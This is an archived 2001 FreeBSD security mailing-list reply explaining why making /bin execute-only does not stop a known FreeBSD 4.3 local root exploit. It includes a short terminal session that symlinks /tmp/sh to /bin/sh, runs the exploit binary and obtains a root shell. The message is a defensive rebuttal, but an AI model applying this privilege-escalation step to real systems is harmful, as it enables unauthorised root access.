Date: Thu, 12 Jul 2001 16:24:02 -0300 (ART) From: Fernando Gleiser <fgleiser@cactus.fi.uba.ar> To: Ryan <ryanpek@swbell.net> Cc: <security@FreeBSD.ORG> Subject: Re: FreeBSD 4.3 local root PREVENTIONS Message-ID: <20010712162140.N17358-100000@cactus.fi.uba.ar> In-Reply-To: <002401c10afc$ffcc9b00$45d8db40@mhx800>
next in thread | previous in thread | raw e-mail | index | archive | help
On Thu, 12 Jul 2001, Ryan wrote: > another extra thing you can do is set the permissions on /bin/ > like I have everything in there chmod 111 > > which would prevent copying > bash-2.05$ cp /bin/sh /tmp/ > cp: /bin/sh: Permission denied It doesn't help much, you can symlink /tmp/sh to /bin/sh. Or, as others have noted, you can edit the shellcode to exec whatever you want.: bash-2.03$ ls -l /bin/sh ---x--x--x 1 root wheel 446952 Apr 21 06:05 /bin/sh bash-2.03$ ln -s /bin/sh /tmp/sh bash-2.03$ ./a.out vvfreebsd. Written by Georgi Guninski shall jump to bfbffe72 child=749 login: done # id uid=0(root) gid=1001(fgleiser) groups=1001(fgleiser), 0(wheel) # > > So simple things like going into all the folders and chmod'n things is a > very good idea for a lil extra security. > > along with copying /bin/sh to /tmp/ > and chmod 0 /tmp/sh > > Ryan > ryanpek@swbell.net > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010712162140.N17358-100000>